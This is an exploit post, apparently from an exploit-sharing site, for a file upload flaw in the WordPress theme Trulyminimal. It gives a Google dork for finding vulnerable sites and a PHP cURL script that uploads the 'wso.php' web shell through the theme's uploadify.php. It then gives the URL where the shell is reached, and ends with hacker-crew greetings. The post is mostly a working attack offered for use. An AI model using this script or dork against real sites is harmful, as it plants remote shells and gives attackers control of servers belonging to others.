facebook facebook twitter rss

Wordpress Themes Trulyminimal File Upload Vulnerability

Author: AnonBoy , Published: 19-04-2014
############################################################################

# Title : Wordpress Themes Trulyminimal File Upload Vulnerability

# Author : AnonBoy

# Date : 19/04/2014

# Facebook => https://www.facebook.com/nufailienafratsim.moechtar

# Vandor : N/a

# Google Dork => inurl:/wp-content/themes/trulyminimal

# Tested on : Windows 7 , Windows Vista

############################################################################



Exploit : uploadshell.php




<?php

$uploadfile
="wso.php";
$ch curl_init("http://target.com/wp-content/themes/trulyminimal/includes/framework/plugins/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'Filedata'=>"@$uploadfile",
'folder'=>"/wp-content/",
'fileext'=>'php'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";

?>



shell access : http://target.com/wp-content/-wso.php

--------------------------------------------------------------------------------------



[#] Greeting ###################################################################################################################################################### #

./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./sultan Haikal dan Ban Mandum Saudara Lon Di Aceh Cyber Team #

################################################################################################################################################################

Like us on Facebook :